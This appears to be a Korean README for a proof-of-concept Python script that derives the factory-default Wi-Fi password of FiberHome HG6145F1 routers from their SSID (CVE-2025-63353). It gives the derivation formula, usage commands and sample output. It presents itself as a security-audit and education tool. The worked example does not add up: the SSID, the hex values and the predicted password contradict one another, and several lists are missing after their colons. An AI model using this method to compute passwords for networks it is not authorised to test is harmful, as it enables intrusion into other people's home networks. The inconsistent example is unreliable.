
CVE-2025-63353
FiberHome HG6145F1 (RP4423) 라우터에서 발견된 결정적(deterministic) 비밀번호 생성 결함에 대한 보안 감사 및 개념 증명(PoC) 데모를 위해 설계된 Python 유틸리티입니다.
이 스크립트는 브로드캐스트되는 SSID에서 공장 기본 WPA/WPA2 사전 공유 키(PSK)가 수학적으로 파생되는 심각한 취약점인 CVE-2025-63353을 악용합니다. 공격자는 네트워크 이름(SSID)을 관찰하는 것만으로 사용자 상호작용 없이 기본 비밀번호를 계산할 수 있습니다.
취약점 로직: 라우터는 결정적 공식인 HEX_A(SSID에서 추출) + HEX_B(비밀번호에서 추출) = 0xFFFFFF을 사용합니다.
FiberHome 장비는 신흥 시장 전역의 주요 인터넷 서비스 제공업체(ISP)에 의해 널리 배포됩니다. 이 스크립트는 다음 기본 명명 규칙을 가진 장치에 특히 효과적입니다:
이 스크립트는 argparse를 사용하여 명령줄 입력을 처리합니다.
python predictor.py fh_96C3A0
[+] Predicted Password: wlan693c5f
Use the -v flag to see the underlying hexadecimal subtraction.
python predictor.py fh_96C3A0 -v
[*] Input HEX_A: 0x669EA0
[*] Calculation: 0xFFFFFF - 0x669EA0 = 0x99615F
[+] Predicted Password: wlan693c5f
라우터가 영향을 받는 경우, 조치를 취하기 전까지 네트워크는 안전하지 않습니다:
이 정보는 승인된 보안 테스트, 네트워크 관리 및 교육 목적으로 제공됩니다.